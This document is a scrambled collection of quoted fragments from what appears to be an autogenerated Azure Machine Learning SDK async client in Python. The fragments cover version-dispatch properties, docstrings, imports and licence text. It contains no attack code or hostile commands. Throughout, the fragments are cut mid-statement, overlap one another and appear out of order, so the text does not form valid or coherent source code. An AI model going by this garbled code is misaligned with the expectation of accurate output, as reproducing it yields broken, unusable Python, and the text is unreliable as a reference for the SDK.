api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as", "Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient", "on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version", "== '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from", "if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\"", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version: *", "api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version", "v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import", "\"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>`", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else:", "Licensed under the MIT License. See License.txt in the project root for #", "the operation group is not described in the profile. :param credential: Credential needed", "for # license information. # # Code generated by Microsoft (R) AutoRest Code", "from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client,", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version", "parameter sets the default API version if the operation group is not described", "== '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await", "import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as", "2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01':", ":class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations", "2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` *", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` *", "not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self):", "def data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01:", "..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations", "operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API", "import JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as", "* v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations", "from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not", "'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the", "def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str", "not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self):", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version ==", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version: *", "API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version", "the MIT License. See License.txt in the project root for # license information.", "'2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass", "azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from", "MIT License. See License.txt in the project root for # license information. #", "* 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version ==", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {} does not", "'2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "@property def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` *", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if", "Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>`", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version ==", "api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version: *", ":type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. :type subscription_id:", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version ==", "private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>`", "in final version of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient):", "import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version ==", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0':", "from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "'2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0',", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01':", "ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>`", "import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as", "for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module", "from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time", "Azure. For production, you should stick to a particular api-version and/or profile. The", "operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends", "api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass", "from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass", "== '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>`", "api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version", "\"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as", "'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the", "@classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>`", "import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as", "AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version:", "current implemetation of MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core", "in the profile. :param credential: Credential needed for the client to connect to", "else: raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client,", "@property def experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\"", "else: raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client,", "\"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as", "workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>`", "* 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages')", "**kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from", "'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models':", "operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends", "API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0':", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01':", "version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", ":class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations", "BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>`", "api_version == '1.0.0': from ..model_dataplane import models return models elif api_version == 'v1.0':", "version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from", "have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance", "on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "@property def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` *", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif", "..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview:", "the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version ==", "ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "== '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from", "the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\"", "raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config,", "not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self):", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API", "depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01:", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass", "{} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "@property def dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\"", "type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions')", "WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif", "the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\"", "..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not have", "ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0:", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version", "== '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version:", "\"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as", "group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on", "models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models", "@property def assets(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\"", "2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container':", "* 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute')", "* 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "raise ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config,", "..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {} does not have", "@property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\"", "..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations", "import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise", "2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if", "version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "version {} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "'2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the", "public Azure. For production, you should stick to a particular api-version and/or profile.", ":type api_version: str :param base_url: Service URL :type base_url: str :param profile: A", "does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version: *", "not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self):", "import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as", "import models return models elif api_version == 